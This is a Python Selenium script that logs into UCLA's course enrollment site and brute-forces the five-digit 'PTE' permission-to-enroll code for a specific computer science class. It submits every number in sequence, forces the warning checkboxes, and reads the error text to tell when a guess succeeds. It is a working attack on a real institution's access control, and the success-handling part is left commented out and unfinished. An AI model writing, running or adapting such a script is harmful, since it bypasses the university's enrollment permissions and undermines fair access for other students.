import os
from dotenv import load_dotenv
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options  
from selenium.webdriver.support.ui import Select
from selenium import webdriver
import time 
import random
from datetime import datetime
from Email import send_alert
from LogIn import ucla_login


load_dotenv()


driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))
ucla_login(driver)

tab1 = driver.current_window_handle
driver.execute_script("window.open('');")
tab2 = driver.window_handles[1]
driver.execute_script("window.open('');")
tab3 = driver.window_handles[2]

tabs = [tab1, tab2, tab3]

def start_brute_force(start_pte, class_name, class_URL, driver):
    first_pass = True
    wait = WebDriverWait(driver, 300, poll_frequency=0.1)
    
    start_pte_int = int(start_pte)
    for pte_guess_int in range(start_pte_int, 100000):

        if first_pass:
            driver.get(class_URL)
            
            # lec checkbox
            # lec_checkbox = wait.until(EC.element_to_be_clickable((By.ID, "187350200_COMSCI0118-checkbox")))
            # lec_checkbox.click()

            lec_id = "187350200_COMSCI0118-checkbox"
            wait.until(EC.presence_of_element_located((By.ID, lec_id)))
            driver.execute_script("document.getElementById(arguments[0]).click();", lec_id)

            
            # disc checkbox

            disc_id = "187350201_187350200_COMSCI0118-checkbox"
            wait.until(EC.presence_of_element_located((By.ID, disc_id)))
            driver.execute_script("document.getElementById(arguments[0]).click();", disc_id)
            first_pass = False


        #pte button
        pte_button = wait.until(EC.presence_of_element_located((By.ID, "btn_Pte")))
        driver.execute_script("arguments[0].click();", pte_button)

        print("here")

    




        #input pte
        pte_input = wait.until(EC.element_to_be_clickable((By.ID, "txtbox_enroll_warning_pte_flyout_pte")))
        pte_input.clear()

        pte_guess_str = f"{pte_guess_int:05}"
        pte_input.send_keys(pte_guess_str)
        driver.execute_script("arguments[0].blur();", pte_input)

            
        #warning buttons
        warning_ids = [
            "enroll_warning_flyout_warning_checkbox1",
            "enroll_warning_flyout_warning_checkbox3",
            "enroll_warning_flyout_warning_checkbox5"
        ]
        for cb_id in warning_ids:
            element = wait.until(EC.presence_of_element_located((By.ID, cb_id)))
    
            # this block was generated by gemini, since idk wtf to do
            driver.execute_script("""
                var el = document.getElementById(arguments[0]);
                if (el) {
                    el.click();
                    // Force the 'checked' property just in case the UI is laggy
                    if (!el.checked) {
                        el.checked = true;
                    }
                    // Trigger events so the website's backend logic knows we clicked
                    el.dispatchEvent(new Event('change', { bubbles: true }));
                    el.dispatchEvent(new Event('input', { bubbles: true }));
                }
            """, cb_id)
        
        
        wait.until(EC.element_to_be_clickable((By.ID, "btn_Enroll")))
        driver.execute_script("document.getElementById('btn_Enroll').click();")

        #check for error
        

        combined_xpath = "//*[contains(text(), 'PTE is invalid') or contains(text(), 'An error occurred')]"

        error_element = wait.until(
            EC.presence_of_element_located((By.XPATH, combined_xpath))
        )
        error_text = error_element.text 

        if "PTE is invalid" not in error_text:
            first_pass = True
            print("REDOOOINGGG")
            
            
        print(f"{datetime.now()}: Tried PTE {pte_guess_str} - Invalid")

        # if not :
        #     print(f"!!! ALERT: Found valid PTE: {pte_guess_str} !!!")
        #     send_alert(class_name, f"Found valid PTE: {pte_guess_str}")
        #     time.sleep(10000)
        #     break
        # else:

   














    

